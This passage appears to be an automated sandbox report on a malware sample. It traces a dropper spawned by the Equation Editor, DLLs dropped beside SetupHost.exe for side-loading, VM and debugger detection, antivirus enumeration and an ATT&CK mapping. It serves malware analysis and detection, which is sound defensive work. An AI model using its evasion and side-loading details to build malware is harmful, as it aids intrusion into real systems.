Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_bios
Query firmware table information (likely to detect VMs)Show sources
Source: C:\$Windows.~WS\Sources\SetupHost.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdsimage.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\DiagTrack.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\DU.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdscsl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdsclientapi.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wpx.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\DiagTrackRunner.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdsutil.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\pidgenx.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\Diager.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\9697.exeDropped PE file which has not been started: C:\$Windows.~WS\Sources\wdstptc.dllJump to dropped file
Source: C:\$Windows.~WS\Sources\SetupHost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-36127
Source: C:\$Windows.~WS\Sources\SetupHost.exeAPI coverage: 9.7 %
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2536Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2536Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exe TID: 2620Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exe TID: 260Thread sleep time: -660000s >= -30000sJump to behavior
Source: C:\Windows\System32\vdsldr.exe TID: 2864Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_ComputerSystem
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::ExecQuery - SELECT Manufacturer, Name, Caption, Architecture, MaxClockSpeed FROM Win32_Processor
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BFD75 memset,SetLastError,GetLastError,FindFirstFileW,memset,wcsrchr,SetLastError,SetLastError,CompareStringW,CompareStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,memset,FindNextFileW,GetLastError,GetLastError,GetLastError,FindClose,GetLastError,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetLastError,SetLastError,5_2_009BFD75
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A04EA0 FindFirstFileW,5_2_00A04EA0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A04D90 GetLogicalDriveStringsW,5_2_00A04D90
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FDC8E GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_009FDC8E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A06460 IsDebuggerPresent,OutputDebugStringA,5_2_00A06460
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FDE32 __EH_prolog3_GS,memset,memset,memset,memset,memset,RtlGetVersion,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,SetLastError,GetLastError,LoadLibraryW,GetProcAddress,GlobalFree,GetLastError,GetLastError,RegOpenKeyExW,RegCloseKey,CompareStringW,CompareStringW,GetLastError,GetLastError,FreeLibrary,RegCloseKey,5_2_009FDE32
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C20B8 mov eax, dword ptr fs:[00000030h]5_2_009C20B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C20B8 mov eax, dword ptr fs:[00000030h]5_2_009C20B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C20B8 mov eax, dword ptr fs:[00000030h]5_2_009C20B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C20B8 mov eax, dword ptr fs:[00000030h]5_2_009C20B8
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DA1B0 mov eax, dword ptr fs:[00000030h]5_2_009DA1B0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C41C5 mov eax, dword ptr fs:[00000030h]5_2_009C41C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C41C5 mov eax, dword ptr fs:[00000030h]5_2_009C41C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C41C5 mov eax, dword ptr fs:[00000030h]5_2_009C41C5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009CD284 mov eax, dword ptr fs:[00000030h]5_2_009CD284
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C23C9 mov eax, dword ptr fs:[00000030h]5_2_009C23C9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2486 mov eax, dword ptr fs:[00000030h]5_2_009C2486
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DB40B mov eax, dword ptr fs:[00000030h]5_2_009DB40B
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DB40B mov eax, dword ptr fs:[00000030h]5_2_009DB40B
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2459 mov eax, dword ptr fs:[00000030h]5_2_009C2459
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1452 mov eax, dword ptr fs:[00000030h]5_2_009C1452
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C15EF mov eax, dword ptr fs:[00000030h]5_2_009C15EF
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C35EB mov eax, dword ptr fs:[00000030h]5_2_009C35EB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C35EB mov eax, dword ptr fs:[00000030h]5_2_009C35EB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C35EB mov eax, dword ptr fs:[00000030h]5_2_009C35EB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BF6D6 mov eax, dword ptr fs:[00000030h]5_2_009BF6D6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BF6D6 mov ecx, dword ptr fs:[00000030h]5_2_009BF6D6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4603 mov eax, dword ptr fs:[00000030h]5_2_009C4603
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4603 mov eax, dword ptr fs:[00000030h]5_2_009C4603
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DE7B9 mov eax, dword ptr fs:[00000030h]5_2_009DE7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DE7B9 mov eax, dword ptr fs:[00000030h]5_2_009DE7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DE7B9 mov eax, dword ptr fs:[00000030h]5_2_009DE7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DE7B9 mov eax, dword ptr fs:[00000030h]5_2_009DE7B9
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF723 mov eax, dword ptr fs:[00000030h]5_2_009DF723
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BF75B mov eax, dword ptr fs:[00000030h]5_2_009BF75B
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1774 mov eax, dword ptr fs:[00000030h]5_2_009C1774
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov ecx, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C3859 mov eax, dword ptr fs:[00000030h]5_2_009C3859
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C49F4 mov eax, dword ptr fs:[00000030h]5_2_009C49F4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1913 mov eax, dword ptr fs:[00000030h]5_2_009C1913
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1913 mov eax, dword ptr fs:[00000030h]5_2_009C1913
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1913 mov eax, dword ptr fs:[00000030h]5_2_009C1913
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF942 mov eax, dword ptr fs:[00000030h]5_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF942 mov eax, dword ptr fs:[00000030h]5_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF942 mov eax, dword ptr fs:[00000030h]5_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF942 mov eax, dword ptr fs:[00000030h]5_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF942 mov eax, dword ptr fs:[00000030h]5_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DF942 mov eax, dword ptr fs:[00000030h]5_2_009DF942
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2960 mov eax, dword ptr fs:[00000030h]5_2_009C2960
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4AD3 mov eax, dword ptr fs:[00000030h]5_2_009C4AD3
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DBACF mov eax, dword ptr fs:[00000030h]5_2_009DBACF
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BFA04 mov eax, dword ptr fs:[00000030h]5_2_009BFA04
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BFA04 mov eax, dword ptr fs:[00000030h]5_2_009BFA04
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009DBA64 mov eax, dword ptr fs:[00000030h]5_2_009DBA64
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C6B97 mov eax, dword ptr fs:[00000030h]5_2_009C6B97
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2B85 mov eax, dword ptr fs:[00000030h]5_2_009C2B85
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009D6BB5 mov eax, dword ptr fs:[00000030h]5_2_009D6BB5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov ecx, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C2BB0 mov eax, dword ptr fs:[00000030h]5_2_009C2BB0
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4CA4 mov eax, dword ptr fs:[00000030h]5_2_009C4CA4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4CA4 mov eax, dword ptr fs:[00000030h]5_2_009C4CA4
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009D6CC6 mov eax, dword ptr fs:[00000030h]5_2_009D6CC6
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1CC2 mov eax, dword ptr fs:[00000030h]5_2_009C1CC2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1CC2 mov eax, dword ptr fs:[00000030h]5_2_009C1CC2
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C0DBA mov eax, dword ptr fs:[00000030h]5_2_009C0DBA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C0DBA mov eax, dword ptr fs:[00000030h]5_2_009C0DBA
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1EFB mov eax, dword ptr fs:[00000030h]5_2_009C1EFB
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1E1A mov eax, dword ptr fs:[00000030h]5_2_009C1E1A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1E1A mov eax, dword ptr fs:[00000030h]5_2_009C1E1A
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009BEE2E mov eax, dword ptr fs:[00000030h]5_2_009BEE2E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4E74 mov eax, dword ptr fs:[00000030h]5_2_009C4E74
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C4E74 mov eax, dword ptr fs:[00000030h]5_2_009C4E74
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1E6D mov eax, dword ptr fs:[00000030h]5_2_009C1E6D
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0A1E5 RegGetValueW,GetProcessHeap,HeapAlloc,RegGetValueW,GetProcessHeap,HeapFree,5_2_00A0A1E5
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FF60E memset,memset,memset,memset,memset,memset,memset,memset,GetLastError,GetWindowsDirectoryA,ExpandEnvironmentStringsW,GetFileAttributesW,GetTempPathW,wcsrchr,SetUnhandledExceptionFilter,GetCurrentProcessId,GetLastError,RtlAddVectoredExceptionHandler,RtlAddVectoredExceptionHandler,5_2_009FF60E
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0010D SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,TlsFree,TlsGetValue,TlsFree,EnterCriticalSection,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LeaveCriticalSection,5_2_00A0010D
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A0EB2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00A0EB2C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\9697.exe C:\Users\user\AppData\Roaming\9697.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeProcess created: C:\$Windows.~WS\Sources\SetupHost.exe 'C:\$Windows.~WS\Sources\SetupHost.Exe' /Download /Web Jump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_00A01F8C InitializeSecurityDescriptor,AllocateAndInitializeSid,AllocateAndInitializeSid,AllocateAndInitializeSid,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,EqualSid,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,5_2_00A01F8C
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009C1150 AllocateAndInitializeSid,CheckTokenMembership,GetLastError,FreeSid,GetLastError,SetLastError,5_2_009C1150
Source: 9697.exe, 00000004.00000002.3356939665.0000000001E20000.00000002.00000001.sdmp, SetupHost.exe, 00000005.00000002.3354056909.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: 9697.exe, 00000004.00000002.3356939665.0000000001E20000.00000002.00000001.sdmp, SetupHost.exe, 00000005.00000002.3354056909.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: 9697.exe, 00000004.00000002.3356939665.0000000001E20000.00000002.00000001.sdmp, SetupHost.exe, 00000005.00000002.3354056909.0000000000A30000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: GetLocaleInfoW,5_2_00A05150
Source: C:\Users\user\AppData\Roaming\9697.exeQueries volume information: C:\$Windows.~WS\Sources VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeQueries volume information: C:\$Windows.~WS VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\9697.exeCode function: 4_2_01383155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_01383155
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009B7DEF GetTimeZoneInformation,GetLastError,GetSystemTime,SystemTimeToTzSpecificLocalTime,5_2_009B7DEF
Source: C:\$Windows.~WS\Sources\SetupHost.exeCode function: 5_2_009FE4A7 memset,RtlGetVersion,GetLastError,5_2_009FE4A7
Source: C:\$Windows.~WS\Sources\SetupHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\$Windows.~WS\Sources\SetupHost.exeWMI Queries: IWbemServices::CreateInstanceEnum - AntiVirusProduct

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Drive-by Compromise1Windows Management Instrumentation131DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API2Boot or Logon Initialization ScriptsAccess Token Manipulation1Obfuscated Files or Information2LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Process Injection12Timestomp1Security Account ManagerSystem Information Discovery138SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsCommand and Scripting Interpreter2Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsSecurity Software Discovery15SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion13Cached Domain CredentialsVirtualization/Sandbox Evasion13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncProcess Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
